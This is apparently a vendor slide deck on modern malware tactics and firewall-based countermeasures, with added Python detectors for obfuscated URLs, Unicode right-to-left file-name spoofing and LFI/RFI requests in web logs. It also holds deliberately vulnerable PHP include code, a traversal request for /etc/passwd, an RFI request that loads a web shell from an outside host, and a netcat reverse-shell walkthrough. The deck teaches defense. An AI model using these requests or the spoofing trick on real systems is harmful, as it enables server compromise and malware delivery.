Modern Malware: Tactics & Countermeasures
General Agenda
 - Tactics of modern malware
 - Countermeasures with Next Generation FW
Page 2 2012 Palo Alto Networks
Tactics of Modern Malware
Goal of the session
 - Showing the different stages that take place during a modern malware infection
 - Understanding the sophistication and dedication required to build up an APT (Advanced Persistent Threat)
 - Learning the different mechanisms that attackers use
It's important to note that using these tactics against real sites or users may be punished by law.
What has changed / What remains the same
The attacker has changed:
 - Nation-states
 - Criminal organizations
 - Political groups
The strategy has evolved:
 - Patient process, step by step
 - User compromise and future expansion
The technique has evolved:
 - New ways of delivering malware
 - Hidden communication
 - Signature evasion
It's not the end of the world:
 - It's not new, just more common
 - There are solutions
 - Don't assume every incident is due to an APT
Cyber Threats: A National Topic
"We know foreign countries and companies swipe our corporate secrets. Now our enemies are also seeking the ability to sabotage our power grid, our financial institutions and our air-traffic control systems. We cannot look back years from now and wonder why we did nothing in the face of real threats to our security and our economy." President Obama, State of the Union Address, February 2013
"But even more alarming is an attack that happened two months ago when a very sophisticated virus called Shamoon infected computers in the Saudi Arabian State Oil Company Aramco. More than 30,000 computers that it infected were rendered useless and had to be replaced. It virtually destroyed 30,000 computers. Imagine the impact an attack like that would have on your company or your business. The collective result of these kinds of attacks could be a cyber Pearl Harbor." Leon Panetta, Former Director of the CIA, Current Secretary of Defense
Recent Victim of a Malware Attack
 - The attack followed an exposé on corruption and influence peddling in China's ruling Communist Party
 - Attackers planted 45 pieces of malware on Times systems, 44 of which were undetected by traditional desktop antivirus software
 - Used university networks as a staging ground for the assault
Source: http://securityledger.com/new-york-times-hack-puts-antivirus-on-defensive/
The Strategic Role of Modern Malware: Infection -> Escalation -> Remote Control
Malware provides the internal foothold to control and expand a sustained attack.
The challenges to traditional security
 - Threats use different techniques, but security remains segmented: exploits, malware, spyware, obfuscation
 - Threats use the weak points of security to avoid being discovered
 - The most patient attacks need to cross the perimeter several times without being detected
 - Targeted and customized malware is capable of evading traditional signatures
 - Attacks with new malware, never seen before, are increasing
The Gaps in Traditional Antivirus Protection
Modern malware is increasingly able to:
 - Avoid falling into traditional AV honeypots
 - Evolve before protection can be delivered
Targeted and custom malware, polymorphic malware, newly released malware: highly variable time to protection.
WildFire finds 200-400 unique new malware samples undetectable by leading antivirus software every day.
The Evolving Threat Landscape
 - Hacktivism and Affiliates: low to medium sophistication, politically motivated sabotage and theft. Examples: Anonymous, LulzSec, Pr0j3ct M4yh3m
 - Organized Cybercrime: medium to high sophistication, large-scale theft of financial data, hack-for-profit. Examples: Russian Business Network
 - Nation-State Actors: highly sophisticated, persistent, and well-funded intelligence gathering. Examples: Aurora, Titan Rain, Shady RAT, GhostNet
They usually have a complex structure:
 - Botnet kit authors
 - Phishing developers
 - Spam senders
 - Drive-by experts
 - Carders
Lifecycle of a Modern Threat
Stages and processes in modern malware
We will cover the technical aspects related to each of these stages: Bait -> Exploit -> Download -> Back channel -> Steal
Attack Stages of Modern Malware
 - Targeted malicious email sent to user
 - User clicks on link to a malicious website
 - Malicious website exploits client-side vulnerability
 - Drive-by download of malicious payload
Scope of the problem: RSA case detailed (CVE-2011-0609)
Sources: http://www.wired.com/threatlevel/2011/08/how-rsa-got-hacked/ and http://www.f-secure.com/weblog/archives/00002226.html
Scope of the problem: RSA case detailed (continued)
Baiting the user: content obfuscation
Content obfuscation
Definition (Wikipedia): In software development, obfuscated code is the deliberate act of making source or machine code difficult to understand by humans. Programmers may deliberately obfuscate code to conceal its purpose (security through obscurity) or its logic to prevent tampering, deter reverse engineering, or as a puzzle or recreational challenge for someone reading the source code.
Content obfuscation
Target:
 - Deceive the user into clicking on a URL or malicious file that doesn't look malicious.
 - Evade pattern-matching detection systems for malicious code.
Actions:
 - Build URLs that don't appear malicious to the end user, using different mechanisms.
 - Hide real file extensions behind others considered benign.
 - Modify JavaScript code to make it unreadable, as an obfuscation tactic to evade pattern-matching detection systems.
URL obfuscation
 - Use of plausible-looking paths on IP addresses instead of host names: http://192.168.2.90/amazon/account_update/update-now
 - Use of the @ symbol. Everything on the left side of the @ is not used (detected by most modern browsers): http://www.bbva.es/system/activate@192.168.2.90/vuln.php
 - Use of lengthy strings so that the URL doesn't fit in the browser address bar.
 - URL encoding using hex, dword or octal: http://%31%39%32%2e%31%36%38%2e%32%2e%39%30 (http://192.168.2.90)
URL obfuscation
 - Use of similar but invalid domains, hidden under false tags (note the real link, www.cajamadrid.hk, and the one the attacker is trying to imitate, www.cajamadrid.es):
 - Image mapping with malicious URLs. As soon as the victim clicks anywhere on the image, it is redirected to a false page, usually similar to the real one. Let's see an example with the following HTML code and its result:
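As an added example (not from the original deck), a small Python checker that flags the URL tricks listed on the two slides above: IP-address hosts, a decoy name before an @, a percent-encoded host name, overlong URLs, and link text that names a different host than the link target. The sample URLs are constructed; the @ sample puts the decoy name before the first slash, which is where a URL parser treats it as user info.

```python
import ipaddress
import re
from urllib.parse import urlsplit, unquote

# Constructed samples built from the tricks on the slides above (hosts are the
# slides' own RFC 1918 addresses; the @ sample places the decoy before the
# first '/', where a URL parser reads it as user info rather than a path).
SAMPLES = {
    "ip_host": "http://192.168.2.90/amazon/account_update/update-now",
    "at_sign": "http://www.bbva.es@192.168.2.90/vuln.php",
    "hex_host": "http://%31%39%32%2e%31%36%38%2e%32%2e%39%30",
    "overlong": "http://192.168.2.90/" + "a" * 300,
    "clean": "https://www.example.com/login",
}

def analyse_url(url, max_len=200):
    """Return a sorted list of obfuscation indicators found in the URL."""
    findings = []
    parts = urlsplit(url)
    # User info before '@': the name on the left is never the destination.
    if parts.username is not None:
        findings.append("userinfo-before-@")
    host = parts.hostname or ""
    # Percent-encoded host name: decode it before looking at it.
    decoded = unquote(host)
    if decoded != host:
        findings.append("percent-encoded-host")
        host = decoded
    # Bare IP address instead of a host name (also catches the decoded form).
    try:
        ipaddress.ip_address(host)
        findings.append("ip-address-host")
    except ValueError:
        pass
    # Very long URL that will not fit in the browser address bar.
    if len(url) > max_len:
        findings.append("overlong-url")
    return sorted(findings)

HOST_RE = re.compile(r"(?:https?://)?([a-z0-9-]+(?:\.[a-z0-9-]+)+)")

def link_text_mismatch(link_text, href):
    """True when the visible link text names a host other than the real target,
    e.g. www.cajamadrid.es shown for a link that goes to www.cajamadrid.hk."""
    m = HOST_RE.search(link_text.lower())
    if not m:
        return False  # text is not a host name, nothing to compare
    return m.group(1) != (urlsplit(href).hostname or "")

if __name__ == "__main__":
    for name, url in SAMPLES.items():
        print(f"{name:9s} {analyse_url(url)}")
    print(link_text_mismatch("www.cajamadrid.es", "http://www.cajamadrid.hk/login"))
```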
Hiding real file extensions
 - The tactic has been known since 2007, but it's now that a lot of activity has been detected in malware (especially starting in 2011).
 - It's based upon the support Unicode offers for multiple languages, including those written from right to left (like Arabic or Hebrew).
 - Unicode has a variety of RTL (Right To Left) and LTR (Left To Right) control codes, after which the content is reversed. Furthermore, the codes are invisible.
 - All versions of Windows, starting with Vista, are vulnerable by default. Older versions require the installation of support for RTL languages.
Hiding real file extensions: Example
First we select the character U+202E (RTL, Right-To-Left Override) with the Windows character map tool:
Hiding real file extensions: Example
Then we rename the file, choosing the right name. In our example we will rename notepad.exe as notepad[U+202E]cod.exe. Note that in the Windows CLI the file is displayed properly, including a "?" character representing the RTL one.
Hiding real file extensions: Example
On the other hand, via the file explorer the change works (modifying the icon would be trivial as well). These techniques could also be valid for email addresses or URLs, depending on the client program the end user is using.
Hiding real file extensions: Example
It's of course possible to play with more complex names, e.g. [RTLO]cod.yrammusevituc[LTRO]n1c[LTRO].exe, which will be displayed as nc1.executivesummary.doc in the Windows file explorer. Other OSes like Ubuntu or Mac are also able to interpret RTL characters:
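As an added example (not from the original deck), a Python check for the trick shown on the last four slides: it finds Unicode bidi control characters in a file name, approximates how the simple single-override case renders, and compares the displayed extension with the one the OS acts on. The rename from the slides, notepad[U+202E]cod.exe, is the constructed sample; the rendering helper covers only the single U+202E case, not the more complex mixed name on the last slide.

```python
import unicodedata

# Bidi classes of the Unicode control characters that reorder display
# (explicit embeddings, overrides and isolates, plus their terminators).
BIDI_CONTROL_CLASSES = {"LRE", "RLE", "LRO", "RLO", "PDF",
                        "LRI", "RLI", "FSI", "PDI"}

def find_bidi_controls(name):
    """Return [(index, 'U+XXXX', bidi class)] for every control in the name."""
    return [(i, f"U+{ord(c):04X}", unicodedata.bidirectional(c))
            for i, c in enumerate(name)
            if unicodedata.bidirectional(c) in BIDI_CONTROL_CLASSES]

def displayed_name(name):
    """Approximate rendering for the single-override case on the slides:
    everything after U+202E (RLO) is drawn right to left, and the RLO itself
    is invisible. More complex mixes need the full bidi algorithm."""
    head, rlo, tail = name.partition("\u202e")
    return head + tail[::-1] if rlo else name

def extension(name):
    """Extension as the last dot-separated part, lower-cased ('' if none)."""
    return name.rsplit(".", 1)[1].lower() if "." in name else ""

def assess(name):
    """Summarise one file name: what is shown vs. what the OS executes."""
    shown = displayed_name(name)
    controls = find_bidi_controls(name)
    real_ext, shown_ext = extension(name), extension(shown)
    return {
        "raw": name,
        "displayed": shown,
        "bidi_controls": controls,
        "real_extension": real_ext,
        "displayed_extension": shown_ext,
        # Any bidi control in a file name is worth a look; the extension
        # mismatch is the specific sign of the hidden-extension trick.
        "suspicious": bool(controls) or real_ext != shown_ext,
    }

if __name__ == "__main__":
    # Constructed sample: the rename from the slides, notepad[U+202E]cod.exe
    for raw in ("notepad\u202ecod.exe", "report.pdf"):
        r = assess(raw)
        print(f"shown as {r['displayed']!r}, really .{r['real_extension']}, "
              f"suspicious={r['suspicious']}")
```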
Searching for lambs: Scanning and abusing LFI & RFI
RFI: Remote File Inclusion
Definition (Wikipedia): Remote File Inclusion (RFI) is a type of vulnerability most often found on websites. It allows an attacker to include a remote file, usually through a script on the web server. The vulnerability occurs due to the use of user-supplied input without proper validation. This can lead to something as minimal as outputting the contents of the file, but depending on the severity, to list a few it can lead to:
 - Code execution on the web server
 - Code execution on the client-side such as JavaScript
 - Denial of Service (DoS)
 - Data Theft/Manipulation
LFI & RFI attacks
Target: Inject a local file into a server where we are not administrators (LFI), or do it via a redirection to a remote one (RFI), with the goal of using it later as a landing site.
Actions:
 - Use LFI/RFI scanners.
 - Search sites by hand. Sites built using PHP are usually good candidates.
Of course it's possible to use tactics other than LFI/RFI to get control of the server (for instance all the ones we reviewed in the web attacks session). This is just another example in this area.
LFI+RFI: An example of PHP vulnerable code

    <html>
    <head>
      <title>vulnerable a LFI y RFI</title>
    </head>
    <body>
      <h1>bienvenido a este sitio</h1>
      <?php
        // The page to include is taken straight from the query string, with no validation
        $pagina = isset($_GET['pagina']) ? $_GET['pagina'] : 'index.html';
      ?>
      <p>estás viendo la página: <?php echo "<a href='$pagina'>$pagina</a>"; ?></p>
      <?php include($pagina); ?>
    </body>
    </html>
Exploiting LFI vulnerabilities
The page reads the file index.html if it doesn't receive any value for the pagina parameter. Let's now try to inject another file into the request, creating a kind of Directory Traversal attack: http://192.168.2.90/vuln.php?pagina=../../../etc/passwd
Shell injection via RFI
It's possible to exploit RFI vulnerabilities to get, among other things, a shell on the exploited server itself (this way we get a site we can still use later to inject malware, for instance). For this purpose you can use shells encoded in HTML; there are many available with different features: b374k, c99, r57, locus, c100, ...
All we need to do is exploit the same vulnerability, but as an RFI (Remote File Inclusion), including in the vulnerable parameter the path to web shell code hosted on another server. For instance: http://192.168.2.90/vuln.php?pagina=http://www.sh3ll.org/locus.txt
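As an added example (not from the original deck), a Python scanner that runs over constructed Apache-style access log lines and flags include parameters that look like the LFI and RFI requests shown on the two slides above: a scheme-prefixed remote URL, path traversal, an absolute path or a null byte, checked after undoing percent-encoding. The log lines and client addresses are constructed; the two request URLs are the slides' own.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Constructed Apache-style access log. The second and third request URLs are
# the slides' own LFI and RFI examples; the others are constructed filler,
# including a percent-encoded traversal attempt.
ACCESS_LOG = """\
10.0.0.5 - - [12/Jun/2012:10:01:02 +0200] "GET /vuln.php?pagina=index.html HTTP/1.1" 200 512
10.0.0.7 - - [12/Jun/2012:10:01:09 +0200] "GET /vuln.php?pagina=../../../etc/passwd HTTP/1.1" 200 1840
10.0.0.7 - - [12/Jun/2012:10:01:15 +0200] "GET /vuln.php?pagina=http://www.sh3ll.org/locus.txt HTTP/1.1" 200 9120
10.0.0.7 - - [12/Jun/2012:10:01:20 +0200] "GET /vuln.php?pagina=%2e%2e%2f%2e%2e%2fetc%2fpasswd HTTP/1.1" 200 1840
10.0.0.9 - - [12/Jun/2012:10:02:00 +0200] "GET /vuln.php?pagina=about.html HTTP/1.1" 200 640
"""

# Common Log Format: client ip, ident, user, [timestamp], "METHOD target proto", status
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d+)')

SCHEME_RE = re.compile(r"^[a-z][a-z0-9+.-]*://", re.IGNORECASE)

def classify_value(value):
    """Label one query parameter value as 'rfi', 'lfi' or None.
    parse_qs has already decoded once; a second unquote catches double encoding."""
    v = unquote(value)
    if SCHEME_RE.match(v) or v.startswith("//"):
        return "rfi"  # a URL with a scheme: remote include
    if "../" in v or "..\\" in v or v.startswith("/") or "\x00" in v:
        return "lfi"  # traversal, absolute path or null-byte truncation
    return None

def scan_log(text):
    """Return [(ip, param, decoded value, label)] for every suspicious parameter."""
    hits = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # not CLF, skip rather than guess
        query = urlsplit(m.group("target")).query
        for param, values in parse_qs(query, keep_blank_values=True).items():
            for value in values:
                label = classify_value(value)
                if label:
                    hits.append((m.group("ip"), param, value, label))
    return hits

if __name__ == "__main__":
    for ip, param, value, label in scan_log(ACCESS_LOG):
        print(f"{label.upper():3s} {ip:10s} {param}={value}")
```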
Exploiting RFI vulnerabilities: WebShell execution (locus)
Exploiting RFI vulnerabilities: Getting a back shell
Now we have many resources at our disposal. Each web shell offers its own integrated suite of tools. With locus we can, for example, get access to the system via CLI through a reverse (back) shell. For this purpose we use netcat on the attacker PC, listening on a TCP port where we will receive the back shell; in this example we use 6666. Then we launch the back connect in locus and check what's going on in netcat. Bingo!!! Now we could for instance try a privilege escalation, install a rootkit (later on in this presentation, on the client side), ...
Summary: Global flow
Actors: Attacker (and C&C), popular website (landing site), hop point, malware repository, victim.
 1. The attacker injects the URL, preferably in a legitimate site under his control.
 2. The victim visits the site and is redirected to the malicious URL (iframe).
 3. The victim visits the URL and the drive-by download executes.
 4. The victim downloads and installs the malware and becomes a part of the botnet.
Countermeasures: Next Generation Firewall
Applications Get Through the Firewall
 - Both internal and external applications are accessible through traditional firewalls...
 - ...and can carry inbound threats
 - ...and outbound risks
 - ...and are increasingly encrypted
Requirements for a NGFW
New requirements for the FW:
 - Identify the application
 - Identify the users
 - Scan the application
 - Granular control and visibility
 - Multi-gigabit performance
Why Visibility & Control Must Be In The Firewall
Application Control as an Add-on (port-based FW + App Ctrl in the IPS = two policies):
 - Traffic -> Firewall (port policy decision) -> IPS (App Ctrl policy decision) -> Applications
 - Applications are treated as threats; only what you expressly look for is blocked
 - Implications: the network access decision is made with no application information; applications cannot be safely enabled
NGFW Application Control (application control is in the firewall = single policy):
 - Traffic -> Firewall (App Ctrl policy decision) -> Application IPS (scan application for threats) -> Applications
 - Visibility across all ports, for all traffic, all the time
 - Implications: the network access decision is made based on application identity; application usage can be safely enabled
Fighting Malware in the Cloud
The attacker has many opportunities
Total exposure time = time needed to capture the first sample in the wild + time needed to create and verify the malware signature + time needed to update the virus definitions. With traditional signatures it can take weeks until users are protected.
Evolving Threats Require Intelligent Solutions
An effective modern malware solution must provide:
Visibility
 - See files in all applications, protocols, and ports at all times
 - See files inside SSL, compression, and encoding
 - Visibility into mobile devices and users
Detection & Reaction
 - Sandbox-based behavioral analysis of new unknown files
 - Rapid alerting of malware discovered on the network
 - Complete forensics report of the activity of the malware
Enforcement
 - Automatic updates of signatures to block threats at the firewall
 - True in-line blocking of infecting files and C&C traffic
 - Stream-based malware blocking to preserve performance
Fighting Malware in the Cloud
Centralized malware analysis in the cloud provides key advantages over on-premises solutions:
 - All signatures are rapidly shared with devices globally
 - No need to reprocess files already seen by other customer networks
 - Rapid updating of detection logic (countering VM-aware malware)
 - The cloud safely enables internet access to samples during the analysis period
 - No additional on-premises hardware required
Architecture
Uses two main technologies:
 - Virtual sandbox environment
 - Malware signature generator
Cloud Architecture
Components: File Submission, Comparer, Virtual Test Environment (in the cloud), Automated Signature Generator, Admin Web Portal. Files flow in for analysis; signatures flow back out.
The Power of Combining Malware Protection and Application Control
Today's Focus: Evasive Traffic in Malware
 1. Send malware or C2 traffic over commonly open ports
   - Use existing protocols in unexpected ways
   - Develop custom protocols that meet a specific need of the attacker
 2. Use standard protocols over nonstandard ports to avoid signatures (e.g. HTTP on port 10000 instead of port 80)
Application Control for Malware Analysis
 - Full stack visibility into all traffic: decodes and identifies traffic regardless of port or evasion
 - Progressive analysis: decodes tunneled protocols and communications
 - Identifies evasive techniques: encryption, proxies, anonymizers, circumventors
 - Shows non-compliant or unknown traffic: not identified by decoders, signatures or heuristics
Evasive Traffic Observed in Malware
Newly detected malware in live networks (April 2012): use of non-standard ports, dynamic DNS, use of proxies and custom traffic were the most common techniques.
 - 16,497 newly discovered malware samples, 66% undetected by traditional AV vendors
 - 13,256 samples (80%) generated Internet traffic
 - Of those samples, 7,918 (59%) generated evasive traffic
Common Evasive Behaviors in Malware (number of samples per behavior; surprisingly little use of IRC)
  short HTTP headers        4470
  unknown traffic           2615
  DDNS / fast-flux domain   1777
  fake HTTP                  429
  nonstandard HTTP port      201
  IRC on regular port          8
  IRC on nonstandard port     13
Unknown traffic was both the most common and the most evasive
3044 samples (23%) generated unknown traffic or fake HTTP.
  behavior                  sessions   samples   sessions per sample
  short HTTP headers           40336      4470    9.0x
  unknown traffic              33567      2615   12.8x
  DDNS / fast-flux domain      14472      1777    8.1x
  fake HTTP                     4696       429   10.9x
  nonstandard HTTP port          459       201    2.3x
  IRC on regular port             12         8    1.5x
  IRC on nonstandard port         39        13    3.0x
Opportunity to Manage the Unknowns
 - Unknown traffic is found at significantly higher rates in malware than in valid network traffic: 11% of malware sessions presented as unknown, versus 0.6% of enterprise network traffic sessions (based on data from the Application Usage and Risk Report, covering thousands of networks).
 - Enterprises can progressively reduce the amount of unknown traffic: create custom App-IDs for internally developed or custom applications. This shifts the odds in favor of IT over time.
An Integrated Approach to Threat Prevention
 - Applications: visibility and control of all traffic, across all ports, all the time
 - Sources: control traffic sources and destinations based on risk
 - Known Threats: stop exploits, malware, spying tools, and dangerous files
 - Unknown Threats: automatically identify and block new and evolving threats
Reducing risk:
 - Reduce the attack surface
 - Control the threat vector
 - Control the methods that threats use to hide
 - Sites known to host malware
 - Find traffic to command and control servers
 - SSL decrypt high-risk sites
 - Integrated threat prevention across exploits and malware
 - Stream-based anti-malware
 - Control threats across any port
 - Behavioral analysis of unknown files
 - Visibility and automated management of unknown traffic
 - Anomalous behaviors
References
References (some)
[1] OWASP, "Malicious file execution": https://www.owasp.org/index.php/top_10_2007-a3
[2] lionaneesh, "Understanding LFI & RFI attacks": http://www.go4expert.com/forums/showthread.php?t=26158
[3] Pudja Mansyurin, "Web Shell (B374k, C99, R57)": http://www.almanshurin.com/programming/web-shell-b374k-c99-r57.html
[4] Wayne Huang, "Drivesploit: Circumventing Automated Detection of Browser Exploits" (BlackHat USA 2010): http://www.youtube.com/watch?v=9areqorsqww
[5] ESET, "Drive-by-Download: infección a través de sitios web" (Drive-by download: infection through web sites): http://www.eset-la.com/centro-amenazas/articulo/drive-by-downloadinfeccion-web/1792
[6] Microsoft, "Security Intelligence Report Volume 12": http://www.microsoft.com/security/sir/default.aspx
[7] AutoIT programming language: http://www.autoitscript.com/
References (some)
[8] Satyamhax, "Practical RTLO Unicode Spoofing!": http://esploit.blogspot.com.es/2011/05/practical-rtlo-unicode-spoofing.html
[9] BreakingPoint, "Javascript obfuscations": http://www.breakingpointsystems.com/resources/blog/test-security-equipmentblock-javascript-obfuscations/
[10] F-Secure, "How we found the file that was used to hack RSA": http://www.f-secure.com/weblog/archives/00002226.html
[11] Wikipedia (various): http://en.wikipedia.org
[12] Symantec, "Zeus: King of crimeware toolkits": http://www.youtube.com/watch?v=czdbcdpetxk&feature=player_embedded#!
[13] Poison Ivy Remote Administration Tool: http://www.poisonivy-rat.com/
[14] Metasploit Penetration Testing Software: http://www.metasploit.com/
Thanks for your attention!